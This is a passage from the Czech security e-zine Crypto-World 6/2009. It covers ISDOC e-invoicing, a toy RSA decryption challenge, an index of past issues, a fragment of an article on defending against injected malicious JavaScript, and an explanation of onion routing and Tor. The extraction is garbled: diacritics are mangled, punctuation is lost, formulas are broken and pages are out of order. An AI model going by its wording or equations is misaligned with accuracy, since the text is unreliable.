Podpora formaacutetu v jednotlivyacutech ISERP V době psaniacute tohoto člaacutenku (červen 2009) ještě neniacute možneacute hodnotit uacuteroveň implementace v jednotlivyacutech IS protože většina vyacuterobců jiacute plaacutenuje až do podzimniacutech nebo zimniacutech legislativniacutech verziacute Nepochybně bude velmi zajiacutemaveacute porovnat jak jednotliviacute vyacuterobci k implementaci formaacutetu ISDOC ve svyacutech systeacutemech přistoupili Ať to ale provedou tak či onak důležiteacute je že fakturu nebude v systeacutemu přiacutejemce třeba znovu typovat a že položky budou automaticky (nebo alespoň poloautomaticky) rozeznaacuteny V tom se skryacutevaacute siacutela celeacuteho řešeniacute na straně přiacutejemce

Podpora formaacutetu externiacutemi naacutestroji Pro uacutečely podpory průmysloveacuteho nasazeniacute formaacutetu ISDOC již existujiacute i externiacute naacutestroje Jeden z nich vyvinula firma ABRA Software a pojmenovala jej ISDOCReader Jde o freeware tj program kteryacute je možneacute kdykoliv staacutehnout z přiacuteslušneacute adresy (wwwisdocorg) a začiacutet jej volně použiacutevat Tento naacutestroj provede po instalaci asociaci s oběma variantami formaacutetu ISDOC (isdoc i isdocx) a stane se tak vyacutechoziacutem prohliacutežečem tohoto formaacutetu ISDOCReader dovoluje libovolnyacute fakturačniacute doklad zobrazit do vizuaacutelniacute podoby faktury ověřit přiacuteslušnyacutem tlačiacutetkem elektronickyacute podpis dokladu přiacutepadně si doklad i vytisknout Je takeacute možneacute prohliacutežet a exportovat přiacutepadneacute přiacutelohy faktury Dalšiacutem krokem bdquoworkflowldquo zpracovaacuteniacute došleacute elektronickeacute faktury v menšiacute firmě je pak jejiacute postoupeniacute k automatickeacutemu či poloautomatickeacutemu zpracovaacuteniacute do ISERP přiacutejemce k čemuž je opět přiacuteslušneacute tlačiacutetko Technicky bude možnost odeslaacuteniacute dokladu do libovolneacuteho ISERP vyřešena pomociacute konfiguračniacuteho souboru kteryacute si každyacute vyacuterobce bude moci daacutet do sveacute instalace a kteryacute ISDOCReader bude volat

Crypto-World 62009

18

Přiacuteklad použitiacute freewaroveacuteho naacutestroje ISDOCReader na ověřeniacute elpodpisu

Pokud se některyacute z laskavyacutech čtenaacuteřů bude zajiacutemat o projekt ISDOC podrobněji dalšiacute informace včetně posledniacute verze formaacutetu dokumentace jeho datovyacutech struktur přiacutekladů datovyacutech souborů i aktuaacutelniacutech uacutedajů o podpoře formaacutetu jednotlivyacutemi vyacuterobci software nalezne na adrese wwwisdoccz Literatura

[1] Kolektiv autorů Dokumentace ke standardu UBL 20 [online] Dostupnyacute z WWW lthttpdocsoasis-openorgublcs-UBL-20UBL-20htmlgt

[2] Kosek Jiřiacute XML scheacutemata [online] Dostupnyacute z WWW lthttpwwwkosekczxmlschemawxshtmlgt

[3] Kolektiv autorů XSD Schema tutorial [online] Dostupnyacute z WWW lthttpwwww3schoolscomschemadefaultaspgt

[4] Kolektiv autorů sdruženiacute W3c Dokumentace ke Xmldsig [online] Dostupnyacute z WWW lthttpwwww3orgTRxmldsig-coregt

[5] Kolektiv autorů Pracovniacute skupiny pro elektronickou fakturaci SPIS Dokumentace k formaacutetu ISDOC [online] Dostupnyacute z WWW lthttpwwwisdocczgt

Crypto-World 62009

19

D Malaacute soutěž v luštěniacute RSA Pavel Vondruška (pavelvondruskacrypto-worldinfo)

Pro přiacuteznivce našich podzimniacutech soutěžiacute v luštěniacute ale samozřejmě i dalšiacute čtenaacuteře jsem připravil naacutesledujiacuteciacute drobnou uacutelohu Soutěžniacutem uacutekolem je rozluštěniacute šifroveacuteho textu 14 39 07 57 18 34 10 47 17 92 06 31 28 65 32 92 11 41 26 31 26 29 20 80 25 06 00 77 03 60 09 00 03 60 11 44 31 00 05 41 07 92 06 16 04 70 10 75 03 60 18 79 00 46 26 73 23 49 25 18 13 90 K zašifrovaacuteniacute otevřeneacuteho textu byl použit algoritmus RSA a formaacutetovaacuteniacute CW10 (detaily viz naacutepověda) veřejnyacute kliacuteč je (Ne)=(3337 79)

Při luštěniacute se řešitel seznaacutemiacute s algoritmem RSA a uvědomiacute si jak uacutezce souvisiacute bezpečnost algoritmu s modulem N Pro prveacute dva řešitele je připravena odměna V přiacutepadě zaacutejmu se mohou bezplatně zuacutečastnit kurzu Problematika infrastruktury veřejnyacutech kliacutečů (PKI)ldquo kterou 2562009 pořaacutedaacute akademie CZNIC (httpwwwnicczakademiecourse15detail) Lektorem kurzu je PVondruška Svaacute řešeniacute zasiacutelejte na adresu pavelvondruskacrypto-worldinfo Řešeniacute uacutelohy a jmeacutena všech uacutespěšnyacutech luštitelů budou zveřejněna v letniacutem dvojčiacutesle e-zinu Crypto-World 7-82009 kteryacute vyjde 182009 Z tohoto důvodu společně s řešeniacutem zašlete souhlas se zveřejněniacutem sveacuteho jmeacutena resp nickpseudonym kteryacute může byacutet miacutesto něj zveřejněn Přeji pěknou zaacutebavu

Doplňujiacuteciacute informace k soutěžniacute uacuteloze

1 Použityacute šifrovaciacute algoritmus

V podstatě se jednaacute o klasickyacute šifrovaciacute algoritmus založenyacute na RSA kde však otevřenyacute text neniacute formaacutetovaacuten podle PKCS 1 (verze 152021) ale podle naacutemi zadanyacutech pravidel kteraacute označiacuteme jako CW 10 2 Asymetrickyacute algoritmus RSA

Zvoliacuteme prvočiacutesla p a q a vypočteme N = pq

Φ(N) = (p-1)(q-1)

Daacutele zvoliacuteme naacutehodneacute čiacuteslo e kde

Crypto-World 62009

20

1 lt e lt Φ(N) takoveacute že e a Φ(N) jsou nesoudělnaacute

Vypočteme čiacuteslo d takoveacute že

1 lt d lt Φ(N) a

ed equiv 1 mod Φ(N)

Dvojici (Nd) nazveme soukromyacute kliacuteč a (Ne) veřejnyacute kliacuteč

3 Formaacutetovaacuteniacute zpraacutevy (CW10)

Zpraacutevu M překoacutedujeme nejprve do čiacuteselneacuteho tvaru K tomu použijeme některou vhodnou převodovou tabulku Např tuto tabulku

0 1 2 3 4 5 6 7 8 9 6 0 Mezera 2 3 4 A B C D E 7 F G H I J K L M N O 8 P Q R S T U V W X Y 9 Z 1 2 3 4 5 6 7 8 9 Zpraacutevu M pak zformaacutetujeme do posloupnosti čiacutesel pevneacute deacutelky (deacutelka bude rovna deacutelce modulu N) K tomu použijeme vlastniacute formaacutetovaacuteniacute kteraacute pracovně nazveme CW10 Formaacutetovaacuteniacute CW10 1) Maacute-li modul deacutelku k budeme zpraacutevu převedenou podle tabulky dělit na skupiny deacutelky k-1 2) Všechny skupiny musiacute miacutet deacutelku k-1 nemaacute-li proto posledniacute skupina tuto deacutelku doplniacuteme

ji zprava přiacuteslušnyacutem počtem nul 3) Všechny ziacuteskaneacute skupiny nyniacute doplniacuteme zleva jednou nulou Deacutelka každeacute skupiny je po

těchto uacutepravaacutech rovna k 4) Vyacutesledek po šifrovaacuteniacute maacute deacutelku rovnou maximaacutelně k nemaacute-li ji doplniacuteme vyacutesledek zleva

nulami Ziacuteskanyacute vyacutesledek po formaacutetovaacuteniacute M označme M= m1 m2 m3 hellip 4 Zašifrovaacuteniacute zpraacutevy M

Zašifrovaacuteniacutem zpraacutevy M pomociacute veřejneacuteho kliacuteče (Ne) rozumiacuteme řetězec

P = C1 C2 C3 kde

C1 equiv m1e mod N C2 equiv m2

e mod N C3 equiv m3e mod N Ci equiv mi

e mod N

5 Dešifrovaacuteniacute zpraacutevy P

Dešifrovaacuteniacute zpraacutevy P se pak provede tak že použijeme soukromyacute exponent d a tiacutem ziacuteskaacuteme původniacute zpraacutevu M

m1 equiv C1d mod N m2 equiv C2

d mod N m3 equiv C3d mod N mi equiv Cid mod N

6 Bezpečnost Pokud dokaacuteže přiacutejemce udržet svůj soukromyacute kliacuteč v tajnosti (a čiacutesla p a q byla dostatečně velkaacute) pak je ze znalosti šifroveacute zpraacutevy a veřejneacuteho kliacuteče vyacutepočetně složiteacute ziacuteskat otevřenou zpraacutevu

Crypto-World 62009

21

E O čem jsme psali v červnu 2000 ndash 2008 Crypto-World 62000 A Novaacute evropskaacute iniciativa v oblasti kryptografie (JPinkava) 2 B Fermatův test primality Carmichaelova čiacutesla bezčtvercovaacute čiacutesla (PVondruška)3 -5 C Červ LOVE-LETTER-FOR-YOUTXTVBS (PVondruška) 6-8 D EUROCRYPT 2000 (PVondruška) 9-11 E Code Talkers (IIIdiacutel) (PVondruška) 12-14 F Letem šifrovyacutem světem 15 G Zaacutevěrečneacute informace 16 Přiacuteloha Navajo Code Talkers revize z 1561945 soubor Dictionaryhtm

Crypto-World 62001 A Zaacutehadnaacute paacuteska z Prahy IIdiacutel (PVondruška JJanečko) 2- 6 B Radioaktivniacute rozpad a kryptografickeacute kliacuteče (LSmoliacutek) 7-9 C Kryptografie a normy diacutel 8 - Normy IETF - SMIME (J Pinkava) 10-13 D Počiacutetačovyacute kurs Lidovyacutech novin (PVondruška) 14-15 E Security and Protection of Information (D Cvrček) 16 F Praacutevniacute odpovědnost poskytovatelů (JMatejka) 17-23 G Ukončeniacute platnosti zneplatněniacute (a zrušeniacute) certifikaacutetu IIdiacutel (JProkeš) 24-25 H Letem šifrovyacutem světem 26-27 I Zaacutevěrečneacute informace 28 Přiacuteloha priloha6zip (fotografie Security 2001 teacutemata přednaacutešek na konferenci Eurocryptacute2001)

Crypto-World 62002 A Historie a statistika Crypto-Worldu (PVondruška) 2-4 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 4 (JPinkava) 5-8 C Bezpečnost informačniacuteho systeacutemu pro certifikačniacute služby (ISCS)

a objektovaacute bezpečnost (PVondruška) 9-16 D Informace - Cryptology ePrint Archive (VKliacutema) 17 E Letem šifrovyacutem světem 18-19

1 Kritika člaacutenku Je 1024-bitovaacute deacutelka kliacuteče RSA dostatečnaacute (Crypto-World 52002)

2 Zaacutekon o elektronickeacutem podpisu novelizovaacuten - Zaacutekon č 2262002 Sb 3 Hackeři pomozte 4 O čem jsme psali v červnu 2000 a 2001

F Zaacutevěrečneacute informace 20

Crypto-World 62003 A Nebezpečiacute internetovyacutech řešeniacute (MKuchař) 2-6 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 13

Atributoveacute certifikaacutety ndash diacutel 2 (JPinkava) 7-10 C Kryptografickeacute protokoly s nulovyacutem předaacuteniacutem znalostiacute(JPinkava) 11-12 D Elektronickeacute peniacuteze (PVondruška) 13-20 E Letem šifrovyacutem světem 21-23 F Zaacutevěrečneacute informace 24

Crypto-World 62009

22

Crypto-World 62004 A Měsiacutec prvočiacutesel (PVondruška) 2-5 B Statistickyacute rozbor největšiacuteho prvočiacutesla (PTesař) 6-7 C Program STORK - vstupniacute dokumenty přiacuteprava (E-CRYPT) čaacutest 2 (JPinkava) 8-16 D Letem šifrovyacutem světem 17-18 E Zaacutevěrečneacute informace 19

Crypto-World 62005 A Informace pro čtenaacuteře a autory (PVondruška) 2-3 B Kontrola certifikačniacute cesty čaacutest 1 (P Rybaacuter) 4-11 C O neziacuteskateľnosti rodneacuteho čiacutesla z jeho hashu (M Pivoluska) 12-13 D Přehledovaacute zpraacuteva o vyacuteznamnyacutech publikaciacutech a projektech na teacutema

poskytovaacuteniacute anonymity klasifikace a měřitelnost informačniacuteho soukromiacute (privacy) čaacutest 2 (M Kumpošt) 14-17

E Kryptografickeacute eskalačniacute protokoly čaacutest 1 (J Krhovjaacutek) 18-21 F Recenze knihy Jon Erickson Hacking - uměniacute exploitace 22 G O čem jsme psali v červnu 2000-2004 23 H Zaacutevěrečneacute informace 24

Crypto-World 62006 A PKI roaming (L Dostaacutelek) 2-4 B Vyhlaacuteška o podrobnostech atestačniacuteho řiacutezeniacute pro elektronickeacute naacutestroje

a lehkyacute uacutevod do časoveacute synchronizace (P Vondruška) 5-9 C Univerzaacutelniacute posilovače hašovaciacutech funkciacute včetně MD5 a SHA1

aneb zaacutechranneacute kolo pro zoufalce (V Kliacutema) 10-14 D NIST (National Institute of Standards and Technology - USA) a kryptografie Recommendation on Key Management ndash čaacutest 2

(J Pinkava) 15-18 E O čem jsme psali v červnu 1999-2005 19-20 F Zaacutevěrečneacute informace 21

Crypto-World 62007 A Přehled a historie polyalfabetickyacutech šifer (PVondruška) 2-11 B Matematizace komplexniacute bezpečnosti v ČR čaacutest I (JHrubyacute) 12-20 C Mikulaacutešskaacute kryptobesiacutedka Call for Papers 21 D O čem jsme psali v červnu 2000-2006 22-23 E Zaacutevěrečneacute informace 24 Přiacuteloha Mikulaacutešskaacute kryptobesiacutedka (6-7122007)- MKB2007_CallForPapers_cervenpdf

Crypto-World 62008 A RFID Co to vlastně maacuteme v kapse (MHlavaacuteč TRosa) 2 - 17 B Bezpečnost PHP aplikaciacute (JVraacutena) 18 - 22 C Popis šifrovaciacuteho algoritmu Serpent (JJeřaacutebek) 24 - 29 D O čem jsme psali v červnu 2000-2007 30 ndash 31 E Zaacutevěrečneacute informace 32

Crypto-World 62009

23

F Zaacutevěrečneacute informace 1 Sešit Crypto-World je oficiaacutelniacute informačniacute sešit Kryptologickeacute sekce Jednoty českyacutech matematiků a fyziků (GCUCMP) Obsahuje člaacutenky podepsaneacute autory Přiacutepadneacute chyby a nepřesnosti jsou diacutelem PVondrušky a autorů jednotlivyacutech podepsanyacutech člaacutenků GCUCMP za ně nemaacute odbornou ani jinou zodpovědnost Adresa URL na niacutež můžete najiacutet tento sešit (zpravidla 3 tyacutedny po jeho rozeslaacuteniacute) a předchoziacute sešity GCUCMP denně aktualizovaneacute novinky z kryptologie a informačniacute bezpečnosti normy standardy straacutenky některyacutech členů a dalšiacute souvisejiacuteciacute materiaacutely httpcrypto-worldinfo 2 Registrace zrušeniacute registrace Zaacutejemci o e-zin se mohou zaregistrovat pomociacute e-mailu na adrese pavelvondruskacrypto-worldinfo (předmět Crypto-World) nebo použiacutet k odeslaacuteniacute žaacutedosti o registraci elektronickyacute formulaacuteř na httpcrypto-worldinfo Při registraci vyžadujeme pouze jmeacuteno a přiacutejmeniacute titul pracoviště (neniacute podmiacutenkou) a e-mail adresu určenou k zasiacutelaacuteniacute koacutedů ke staženiacute sešitu Ke zrušeniacute registrace stačiacute zaslat kraacutetkou zpraacutevu na e-mail pavelvondruskacrypto-worldinfo (předmět rušiacutem odběr Crypto-Worldu) nebo opět použiacutet formulaacuteř na httpcrypto-worldinfo Ve zpraacutevě prosiacutem uveďte jmeacuteno a přiacutejmeniacute a e-mail adresu na kterou byly koacutedy zasiacutelaacuteny 3 Redakce

E-zin Crypto-World Redakčniacute praacutece Pavel Vondruška Staacuteliacute přispěvateleacute Pavel Vondruška Jaroslav Pinkava Jazykovaacute uacuteprava Jakub Vraacutena Přehled autorů httpcrypto-worldinfoobsahautoripdf NEWS Vlastimil Kliacutema (vyacuteběr přiacutespěvků Jaroslav Pinkava komentaacuteře a Tomaacuteš Rosa vklaacutedaacuteniacute na web) Pavel Vondruška Webmaster Pavel Vondruška jr 4 Spojeniacute (abecedně) redakce e-zinu ezincrypto-worldinfo httpcrypto-worldinfo Vlastimil Kliacutema vklimavolnycz httpcryptographyhyperlinkcz Jaroslav Pinkava JaroslavPinkavazonercz httpcrypto-worldinfopinkava Tomaacuteš Rosa t_rosavolnycz httpcryptohyperlinkcz Pavel Vondruška pavelvondruskacrypto-worldinfo httpcrypto-worldinfovondruskaindexphp Pavel Vondruškajr pavelcrypto-worldinfo httpwebdesigncrypto-worldinfo Jakub Vraacutena jakubvranacz httpwwwvranacz

Page 6: Sešit 6/2009 (452 kB)

Crypto-World 62009

6

Z pohledu administraacutetora serveru by bylo vhodneacute aby klienti přestali použiacutevat FTP protokol pro update straacutenek a tento nahraacuteli SCP nebo FTPS Přiacutestup na server by měl byacutet omezen pouze pro nezbytně nutnyacute rozsah IP adres Rozsahy IP adres pouze pro Českou Republiku a Slovensko Kuba zveřejnil na sveacutem blogu [12] Administraacutetoři by si takteacutež měli zajistit vynuceniacute změny FTP hesla po přibližně 90-ti dnech

Odkazy

[1] Obfuscation - httpenwikipediaorgwikiObfuscated_code [2] Sandbox analyacuteza javascriptu umiacutestěneacuteho ve straacutence httpwepawetiseclaborgviewphphash=63e61b9084ca87248668eb83c9aa5742amptype=js [3] Referenčniacute přiacuteručka Javascript ndash httpsdevelopermozillaorgenCore_JavaScript_15_Reference [4] Analyacuteza javascriptů na Internet Storm Center ndash httpiscsansorgdiaryhtmlstoryid=4246 httpiscsansorgtaghtmltag=javascript [5] Microsoft Script Editor guide - httperikeaenetarchives20050704214950 [6] Českeacute a Slovenskeacute rozsahy IP adres httpwwwdrupalczblogjakub-suchyip-adresy-statu-cz-sk-rozsahy [7] Dancho Danchevs blog - httpddanchevblogspotcom [8] Informace o Neosploit httpsecurityworldczsecurityworldutocnici-ziskali-pristup-k-200-000-serverum-a-nasadili-zde-neosploit-280 [9] Neosploit - přiacutepad z Českeacute Republiky httpwwwbenczczaktualitynas-web-byl-napaden-hackerem [10] Test souborů na vyacuteskyt virů ndash httpvirustotalcom [11] Helix3 tm ndash dřiacuteve dostupnyacute na httpwwwe-fensecom [12] Suchyacute J httpwwwdrupalczblogjakub-suchyip-adresy-statu-cz-sk-rozsahy [13] Vorliacuteček J Suchyacute J Vyacuteprava za obsahem javascriptu

přiacuteloha k e-zinu Crypto-World 62009 Přiacuteloha 1 - bdquoVloženyacute Javascript ndash koacuted ve straacutenceldquo str1-6 Přiacuteloha 2 - bdquoVloženyacute Javascript ndash zdrojovyacute koacutedldquo str7-9 Přiacuteloha 3 - bdquoVloženyacute Javascript ndash škodlivyacute koacutedldquo str10-11 Přiacuteloha 4 - bdquoVyacutesledky antivirovyacutech kontrolldquo str12-24

Crypto-World 62009

7

B Anonymita v globaacutelniacute siacuteti Ing Jan Hajnyacute Uacutestav telekomunikaciacute FEKT VUT Brno (hajnyfeecvutbrcz) Abstrakt ndash Hlavniacutem ciacutelem tohoto člaacutenku je popsat současnyacute stav tyacutekajiacuteciacute se ochrany privaacutetniacutech dat při použiacutevaacuteniacute informačniacutech systeacutemů a identifikovat zaacutekladniacute prostředky pro jejich ochranu V prvniacute čaacutesti jsou zmiacuteněny hlavniacute probleacutemy při využiacutevaacuteniacute současnyacutech informačniacutech technologiiacute a hrozby ktereacute naacutem mohou přineacutest Druhaacute čaacutest člaacutenku se věnuje jednomu z prvniacutech kroků při ochraně anonymity v počiacutetačovyacutech siacutetiacutech Jednaacute se o technologii Tor poskytujiacuteciacute možnost skrytiacute identity Osobniacute data a jejich využiacutevaacuteniacute

V současneacute době již plně žijeme v informačniacute společnosti tedy společnosti založeneacute na datech a jejich přenosu zpracovaacuteniacute Teacuteměř každyacute z naacutes využiacutevaacute osobniacute počiacutetač mobilniacute telefon kreditniacute karty či smart karty pro identifikaci v různyacutech organizaciacutech a uacuteřadech Neniacute však zcela zřejmeacute jakaacute data se ve skutečnosti pomociacute těchto přiacutestrojů přenaacutešiacute a kolik mohou řiacuteci o našem chovaacuteniacute a soukromiacute Nejsou to takeacute pouze zařiacutezeniacute kteraacute vlastniacuteme a kteraacute tak můžeme přiacutemo ovlivnit Jednaacute se i o tzv bezpečnostniacute zařiacutezeniacute všude kde se pohybujeme ndash např dohledoveacute kamery ve městech skenery na letišti biometrickeacute pasy nebo různeacute slevoveacute karty obchodniacutech řetězců Všechny tyto zařiacutezeniacute mohou pracovat s našiacute identitou a my nejsme schopni přiacuteliš ovlivnit kolik informaciacute o naacutes uvolňujiacute Mnoho přiacutekladů může byacutet uvedeno např ze člaacutenků Bruce Schneiera kteryacute se problematikou ochrany identity zabyacutevaacute Ze člaacutenku zabyacutevajiacuteciacuteho se problematikou privaacutetniacutech dat [1] je jasneacute že se nejednaacute pouze o teoretickou hrozbu Přiacutekladem mohou byacutet dohledoveacute systeacutemy Jen v Londyacuteně je v současneacute době okolo 500000 dohledovyacutech kamer [2] I přesto z některyacutech vyacutezkumů vyplyacutevaacute [3] že jejich efektivita neniacute při odhalovaacuteniacute zločinů přiacuteliš vysokaacute Zatiacutemco mohou miacutet menšiacute vliv na přesunutiacute zločinnosti na jinaacute miacutesta v globaacutelnějšiacutem měřiacutetku se neprojeviacute Na druhou stranu jsou tyto systeacutemy v provozu 24 hodin denně a sniacutemajiacute všechny osoby na veřejnyacutech miacutestech S technologickyacutem vyacutevojem nejsme daleko od automatickeacuteho rozpoznaacutevaacuteniacute tvaacuteřiacute a tedy i identifikace osob na zaacuteznamech Budou o naacutes tedy znaacutema data tyacutekajiacuteciacute se našeho pohybu během dne chovaacuteniacute (např kde nakupujeme) a dokonce bude možneacute kamery zneužiacutet k ilegaacutelniacutemu sledovaacuteniacute osob v soukromyacutech bytech atd ktereacute jsou v dosahu kamer Stejně tak znaacuteme leteckeacute fotografie sloužiacuteciacute jako podklady k mapaacutem ndash dostatečně detailniacute na odhaleniacute mnoha informaciacute o soukromyacutech osobaacutech

Dalšiacutem přiacutekladem ohroženiacute identity jsou smart karty a jejich využiacutevaacuteniacute během běžneacute denniacute činnosti Neniacute složiteacute si uvědomit že někde musiacute existovat data o tom co během dne jiacuteme (zaměstnaneckeacute ID karty) nakupujeme v obchodech (kreditniacute karty) jakeacute maacuteme zvyky při naacutekupech např potravin (slevoveacutečlenskeacute karty) nebo o co se zajiacutemaacuteme (videopůjčovnyknihovny) Ve všech těchto přiacutepadech je jednoznačně spojena naše identita s našiacutem chovaacuteniacutem Vytvaacuteřiacute se tak jakyacutesi datovyacute otisk našiacute osobnosti i přesto že tyto data jsou rozprostřena u různyacutech organizaciacute a na různyacutech miacutestech

V některyacutech přiacutepadech dokonce můžeme uacutespěšně tvrdit že data o naacutes velice uacutezce ovlivňujiacute naše životy [4] Na zaacutekladě těchto informaciacute mohou instituce rozhodovat o tom zda dostaneme půjčku v bance zda dostaneme viacutezum do zahraničiacute či zda jsme dostatečně důvěryhodniacute pro sděleniacute tajnyacutech informaciacute Nepřiacutejemnyacutem faktem je že sděleniacute těchto dat si nijak neuvědomujeme a nemůžeme je tiacutem nijak ovlivnit stejně tak jako nemůžeme ovlivnit chyby ktereacute se můžou v těchto datech vyskytnout Jednoduše proto že ani neviacuteme kde jsou v současneacute době data uložena Jelikož se jednaacute o cenneacute informace jsou často prostředkem

Crypto-World 62009

8

obchodu např reklamniacutech agentur To je zřetelneacute při využiacutevaacuteniacute služeb jako je veřejnyacute email internetoveacute obchody vyhledaacutevaciacute naacutestroje či komunikačniacute naacutestroje (Facebook atd) kde je reklama zcela ciacutelenaacute podle toho jak danou službu využiacutevaacuteme Tato reklama je pak takeacute mnohem uacutečinnějšiacute tiacutem paacutedem jsou jejiacute zadavateleacute ochotni platit značneacute sumy za data o uživateliacutech

Jak bylo uvedeno u přiacutekladů z předchoziacuteho textu existuje při použiacutevaacuteniacute informačniacutech technologiiacute přiacuteliš hrozeb na to aby zůstala naše identita skryta Tato digitaacutelniacute identita je pak využiacutevaacutena při aktivitaacutech ktereacute již nemusiacute byacutet zcela v zaacutejmu uživatele Probleacutem je že v teacuteto faacutezi je teacuteměř nemožneacute takoveacuteto užiacutevaacuteniacute dat omezit či kontrolovat Důvodem neniacute až tak technologickaacute nemožnost jako neochota poskytovatelů těchto služeb umožňovat anonymnějšiacute prostřediacute V naacutesledujiacuteciacutem textu bude představen naacutestroj kteryacute může řešit prvotniacute probleacutem tyacutekajiacuteciacute se analyacutezy provozu v datovyacutech siacutetiacutech Je zde uveden jelikož se jednaacute o stavebniacute prvek využitelnyacute při uvedeniacute dalšiacutech technik ochrany anonymity uživatele v celosvětoveacute siacuteti a o prvek bez ktereacuteho by pokročilejšiacute techniky ztraacutecely smysl Adresace v IP siacutetiacutech

Prvniacute probleacutem kteryacute potřebujeme vyřešit v souvislosti se zvyacutešeniacutem anonymity v IP siacutetiacutech je adresace a směrovaacuteniacute Všechna posiacutelanaacute data jsou zapouzdřena do IP paketů viz Obr č 1

Obr č 1 Hlavička IP paketu Součaacutestiacute hlavičky těchto paketů je takeacute zdrojovaacute adresa a ciacutelovaacute adresa tedy jednoznačneacute identifikaacutetory původce komunikace a ciacutele komunikace V předchoziacute kapitole však byly popsaacuteny hrozby plynouciacute z možnosti identifikace komunikace Vidiacuteme že tedy již v naacutevrhu komunikačniacuteho protokolu TCPIP je jistyacute probleacutem braacuteniacuteciacute zvyacutešeniacute anonymity v globaacutelniacute siacuteti Existujiacute však řešeniacute kteraacute jsou již v současneacute době použiacutevaacutena a kteraacute mohou tento probleacutem uacutespěšně vyřešit Ziacuteskaacuteme tak protokol pro anonymniacute komunikaci kde z odchycenyacutech dat nepůjdou zjistit jejiacute uacutečastniacuteci Jedniacutem z těchto řešeniacute je onion routing [6] Onion routing

Ciacutelem metody je anonymniacute provoz v IP siacutetiacutech diacuteky tzv onion routerům Technika využiacutevaacute současnou infrastrukturu je tedy ihned použitelnaacute po nainstalovaacuteniacute přiacuteslušneacuteho software Zaacutekladniacutemi prvky jsou klient (Alice) onion routery a server (Bob) ke ktereacutemu Alice požadavek vysiacutelaacute Z odchycenyacutech dat neniacute možneacute vysledovat ani obsah komunikace ani jejiacute uacutečastniacuteky Každyacute prvek kteryacute se komunikace uacutečastniacute (onion router) znaacute pouze předchoziacute

Crypto-World 62009

9

prvek a naacutesledujiacuteciacute v cestě žaacutednyacute jinyacute Pouze posledniacute onion router v řetězci tzv gateway data rozšifruje vyšle požadavek na server Boba v internetu a obdržiacute odpověď Tato odpověď se zase zašifruje a vraciacute se přes onion routery zpět k původci komunikace Situace je znaacutezorněna pomociacute Obr č 2

Obr č 2 Struktura onion routing

Bezpečnost tohoto řešeniacute a anonymita Alice je založena praacutevě na routerech Ty si předaacutevajiacute data mezi sebou a znajiacute praacutevě jen předchůdce a naacutesledovniacuteka Jelikož je cesta přes routery vždy naacutehodně zvolenaacute a unikaacutetniacute neniacute možneacute zjistit Alici Jedinyacute kdo s niacute přiacutemo komunikuje je prvniacute router nicmeacuteně Alice se chovaacute z jeho pohledu jako běžnyacute router kteryacute provoz takeacute jen přeposiacutelaacute a negeneruje tudiacutež ani prvniacute router neznaacute původce dat Celyacute provoz vyslaacuteniacute požadavku od Alice k Bobovi tedy probiacutehaacute naacutesledovně

1 Všechny prvky v siacuteti vlastniacute soukromyacute a veřejnyacute kliacuteč asymetrickeacute kryptografie 2 V prvniacutem kroku si klient zvoliacute routery přes ktereacute půjde provoz Na jejich počtu zaacutevisiacute

bezpečnost a anonymita ndash čiacutem viacutece tiacutem je menšiacute možnost vysledovaacuteniacute Tato cesta musiacute byacutet naacutehodnaacute Klient znaacute veřejneacute kliacuteče těchto routerů

3 Klient zašifruje svůj požadavek dle naacutesledujiacuteciacuteho postupu )))((( požadavekEhlavEhlavEData

CBA VKVKVK ++=

4 Tedy vezme data pro Boba a zašifruje je pomociacute veřejneacuteho kliacuteče posledniacuteho routeru C (gateway) K vyacutesledku pak připojiacute IP hlavičku s adresou routeru C a znovu zašifruje pomociacute VK předchoziacuteho routeru B Tento proces se opakuje až k prvniacutemu routeru A

5 Tyto data pak odešle routeru A a tvaacuteřiacute se jako běžnyacute router tj že data pouze přeposiacutelaacute Router pomociacute sveacuteho soukromeacuteho kliacuteče rozšifruje kryptogram a zjistiacute hlavičku IP paketu v němž je uložena IP dalšiacuteho routeru a kryptogram zašifrovanyacute veřejnyacutem kliacutečem tohoto routeru Odešle tedy tyto data routeru B Takto postupujeme až k posledniacutemu routeru Jak je vidět žaacutednyacute router se nedozviacute viacutece než IP dalšiacuteho routeru (popř předchoziacuteho kteryacute data zaslal) a zašifrovanaacute data

6 Jakmile doraziacute data k posledniacutemu routeru C mohou byacutet rozšifrovaacutena a ziacuteskaacute se tak požadavek Ten je routerem vyslaacuten do internetu a je ziacuteskaacutena odpověď Odpověď je poslaacutena zpět stejnyacutem kanaacutelem Metoda daacutele přidaacutevaacute dalšiacute bezpečnostniacute techniky napřiacuteklad routery vklaacutedajiacuteciacute naacutehodneacute zpožděniacute do komunikace (aby nebylo možneacute sledovat tok dat dle časovaacuteniacute) či vklaacutedajiacuteciacute nesmyslnaacute data

TOR Vyacuteše zmiacuteněnyacute postup je zaacutekladem onion routingu tedy vytvaacuteřiacute se vrstvy do nichž

jsou vždy šifrovaacuteny informace o dalšiacutem bodě Nejznaacutemějšiacute implementaciacute tohoto postupu je TOR což je projekt The Onion Routing [7] Zde je postup jemně odlišnyacute Vytvořiacute se

Crypto-World 62009

10

symetrickeacute kliacuteče pro každyacute autentizovanyacute router pomociacute Diffie-Hellmanova algoritmu [8] a PKI [9] ktereacute se daacutele využiacutevajiacute k šifrovaacuteniacute zpraacutev (z důvodu rychlosti) Alice pak zpraacutevu zašifruje postupně všemi symetrickyacutemi kliacuteči ve stejneacutem duchu jako v předchoziacutem přiacutepadě viz Obr č 3

Obr č 3 Dopřednyacute směr v TOR

Zpraacuteva je pak doručena bezpečně až Bobovi Ten může vytvořit odpověď a poslat ji zpětnou cestou kde každyacute router zpraacutevu zašifruje svyacutem symetrickyacutem kliacutečem přidaacute tedy dalšiacute vrstvu Až doraziacute zpraacuteva k Alici může byacutet rozšifrovaacutena jelikož Alice všechny symetrickeacute kliacuteče znaacute Situace je znaacutezorněna na Obr č 4

Obr č 4 Odpověď v TOR

Obr č 5 TOR ndash přenos zpraacutev

Crypto-World 62009

11

Vyacutesledkem je praktickaacute implementace kteraacute naacutem dovoliacute komunikovat v IP siacutetiacutech zcela

anonymně i přes nutnost použiacutevaacuteniacute IP adres Zjednodušenyacute proces vytvořeniacute kanaacutelu je takeacute na Obr č 5 Zaacutevěr

